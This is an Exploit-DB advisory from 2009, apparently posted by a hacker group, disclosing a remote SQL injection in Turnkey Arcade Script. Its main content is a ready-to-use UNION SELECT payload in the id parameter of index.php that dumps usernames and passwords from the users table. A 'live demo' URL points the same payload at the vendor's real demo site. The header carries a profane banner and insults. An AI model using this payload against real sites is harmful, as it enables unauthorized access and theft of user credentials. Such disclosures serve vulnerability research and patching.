Turnkey Arcade Script - SQL Injection (2)

EDB-ID:

9511


Platform:

PHP

Published:

2009-08-25

==============================================================================
  ##  Hackteach.OrG ##
             

/ ___   )(  __   )/ ___   )
\/   )  || (  )  |\/   )  |
    /   )| | /   |    /   )
   /   / | (/ /) |   /   / 
  /   /  |   / | |  /   /  
 /   (_/\|  (__) | /   (_/\
(_______/(_______)(_______/
       
==============================================================================
        [»] ~ Note : Hacker R0x Lamerz Sux !
==============================================================================
        [»]  Arcad site Script <== Remote SQL Injection Vulnerability
==============================================================================
    [»] my home:             [ Hackteach.org ]
    [»] Script:              [ Arcad site Script ]
    [»] Language:            [ PHP ]
    [»] Download:            [ http://www.turnkeyarcade.com/ ]
    [»] Founder:             [ Red-D3v1L < php-c0de@hotmail.com > ]
    [»] Gr44tz to:           [ All member Hackteach.org/cc - Str0ke - sp3x ]
    [»] Fuck To :            [ Anti-trust << Big Big Big Lamer << ]
########################################################################

===[ Exploit SQL ]===  

    [»] Path/index.php?action=browse&id=-7+union+select+1,2,concat(password,0x3e,username),4+from+users--


    [»] L1v3 d3m0 : http://www.turnkeyarcade.com/demo/index.php?action=browse&id=-7+union+select+1,2,concat(password,0x3e,username),4+from+users--

Author: Red-D3v1L <-

###########################################################################

# milw0rm.com [2009-08-25]